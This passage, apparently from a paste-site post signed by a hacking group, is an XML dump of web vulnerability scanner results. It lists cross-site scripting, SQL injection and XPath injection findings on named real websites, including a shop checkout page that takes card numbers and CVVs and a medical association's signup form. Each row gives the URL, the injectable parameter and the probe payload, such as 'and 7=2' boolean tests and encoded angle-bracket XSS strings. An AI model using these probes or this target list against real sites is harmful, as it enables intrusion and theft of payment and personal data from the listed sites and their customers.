- <Parameter>phone</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005<>%3c%3e%253c%253e&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>street1</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006<>%3c%3e%253c%253e&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>street2</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007<>%3c%3e%253c%253e&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>city</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008<>%3c%3e%253c%253e&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>county</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009<>%3c%3e%253c%253e&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>postcode</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010<>%3c%3e%253c%253e&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.gottinta.com/ink-cartridges.php?printerbrand=brother</ReferURL>
- <Parameter>printerbrand</Parameter>
- <Type>GET</Type>
- <KWordActionURL>http://www.gottinta.com/ink-cartridges.php?printerbrand=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.gottinta.com/about-us.php</ReferURL>
- <Parameter>search_field</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.gottinta.com/search.php?nav=search^search_field=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.gottinta.com/printer-cartridges.php?printerbrand=Canon ImageRunner</ReferURL>
- <Parameter>printerbrand</Parameter>
- <Type>GET</Type>
- <KWordActionURL>http://www.gottinta.com/printer-cartridges.php?printerbrand=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.gottinta.com/ink-toner-cartridges.php?printer_id=CanonImageRunner1023IF</ReferURL>
- <Parameter>printer_id</Parameter>
- <Type>GET</Type>
- <KWordActionURL>http://www.gottinta.com/ink-toner-cartridges.php?printer_id=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.atthenet.co.uk/item_detail.php?Cat_ID=1^ID=16581</ReferURL>
- <Parameter>ID=16581</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>waist</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.atthenet.co.uk/plussize.php?Cat_ID=1^Item_ID=1</ReferURL>
- <Parameter>Item_ID=1</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Between</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/telugu.php?id=1933</ReferURL>
- <Parameter>id=1933</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Kajal</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/telugu.php^id=1933</ReferURL>
- <Parameter>id=1933</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Kajal</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/politicalnews.php?id=1701</ReferURL>
- <Parameter>id=1701</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>sabha</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/politicalnews.php^id=1701</ReferURL>
- <Parameter>id=1701</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>sabha</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/ap.php?id=6685^start=30</ReferURL>
- <Parameter>start=30</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>fetch</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/studio.php^id=21646</ReferURL>
- <Parameter>id=21646</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Chammak</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/index.php^start3=60</ReferURL>
- <Parameter>start3=60</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Malabar</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/songs.php^id=301</ReferURL>
- <Parameter>id=301</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>March</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/gossy.php^id=1498</ReferURL>
- <Parameter>id=1498</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>younger</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/gossy.php?id=13871\&start=99999999</ReferURL>
- <Parameter>start=99999999</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>fetch</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/film.php^id=130</ReferURL>
- <Parameter>id=130</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Vikram</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/film.php?id=1498 and 7=7&start=0</ReferURL>
- <Parameter>start=0</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>fetch</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/gal.php^id=1572</ReferURL>
- <Parameter>id=1572</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>October</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/bolly.php^id=3468</ReferURL>
- <Parameter>id=3468</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Identify</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/bolly.php?id=130 and 7=2^start=0</ReferURL>
- <Parameter>start=0</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Identify</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/gal.php?id=130 and 7=2&start=99999999</ReferURL>
- <Parameter>start=99999999</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Nayanatara</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/videosm.php^id=460</ReferURL>
- <Parameter>id=460</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Ramarajyam</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/videosm.php?id=1572 and 7=2&start=0</ReferURL>
- <Parameter>start=0</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Tamanna</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/studio.php?id=130 and 7=2&start=30</ReferURL>
- <Parameter>start=30</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>fetch</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/studio.php?id=130 and 7=2&start=99999999</ReferURL>
- <Parameter>start=99999999</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Prakash</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/mv24.php?start=70&id=99999999</ReferURL>
- <Parameter>id=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>Chammak</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.andhraxpress.com/mv24.php?id=130 and 7=2&start=70</ReferURL>
- <Parameter>start=70</Parameter>
- <Type>String</Type>
- <KWordActionURL>Urmila</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>https://www.atthenet.co.uk/checkout.php</ReferURL>
- <Parameter>billing_town=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>https://www.atthenet.co.uk/checkout.php^billing_county=WCRTESTINPUT000005&billing_postcode=WCRTESTINPUT000006&billing_phone=WCRTESTINPUT000007&ship_name=WCRTESTINPUT000008&shipping_address1=WCRTESTINPUT000009&shipping_address2=WCRTESTINPUT000010&shipping_town=WCRTESTINPUT000011&shipping_county=WCRTESTINPUT000012&shipping_postcode=WCRTESTINPUT000013&shipping_phone=WCRTESTINPUT000014&usergroup=visitor&heard_from=Search Engine - Yahoo&billing_country=004&shipping_country=004&email_sign=WCRTESTINPUT000000&pass_sign=&bill_name=WCRTESTINPUT000001&billing_address1=WCRTESTINPUT000002&billing_address2=WCRTESTINPUT000003&billing_town=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.positive-proof.com/customapps/idprogram/app/v1/index.php^email=WCRTESTINPUT000000&token=WCRTESTINPUT000001&do=parent.login</ReferURL>
- <Parameter>do=parent.login</Parameter>
- <Type>String</Type>
- <KWordActionURL>Error</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.worldspinalcolumn.org/case.php^id=229</ReferURL>
- <Parameter>id=229</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>WORLD</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.worldspinalcolumn.org/join_now.php?^passworde=WCRTESTINPUT000001&confirmpassword=WCRTESTINPUT000002&firstname=WCRTESTINPUT000003&lastname=WCRTESTINPUT000004&hospitalclinic=WCRTESTINPUT000005&address1=WCRTESTINPUT000006&city=WCRTESTINPUT000007&stateprovince=WCRTESTINPUT000008&postalcode=WCRTESTINPUT000009&phone=WCRTESTINPUT000010&fax=WCRTESTINPUT000011&mobile=WCRTESTINPUT000012&memberid=&memberstatus=deactive®isterip=109.169.70.134&joinus=Join Us&MM_insert=join&salutation=Dr.&country=1&email=WCRTESTINPUT000000</ReferURL>
- <Parameter>email=!S!WCRTESTINPUT000000!E!</Parameter>
- <Type>String</Type>
- <KWordActionURL>WORLD</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.worldspinalcolumn.org/join_now.php?^fax=WCRTESTINPUT000011&mobile=WCRTESTINPUT000012&memberid=&memberstatus=deactive®isterip=109.169.70.134&joinus=Join Us&MM_insert=join&salutation=Dr.&country=1&email=WCRTESTINPUT000000&passworde=WCRTESTINPUT000001&confirmpassword=WCRTESTINPUT000002&firstname=WCRTESTINPUT000003&lastname=WCRTESTINPUT000004&hospitalclinic=WCRTESTINPUT000005&address1=WCRTESTINPUT000006&city=WCRTESTINPUT000007&stateprovince=WCRTESTINPUT000008&postalcode=WCRTESTINPUT000009&phone=1</ReferURL>
- <Parameter>phone=1</Parameter>
- <Type>String</Type>
- <KWordActionURL>WORLD</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- </SiteVulList>
- </ROOT>
- ==============================
- Dimension Blood Money/Swastika
- ==============================
Advertisement
Add Comment
Please, Sign In to add comment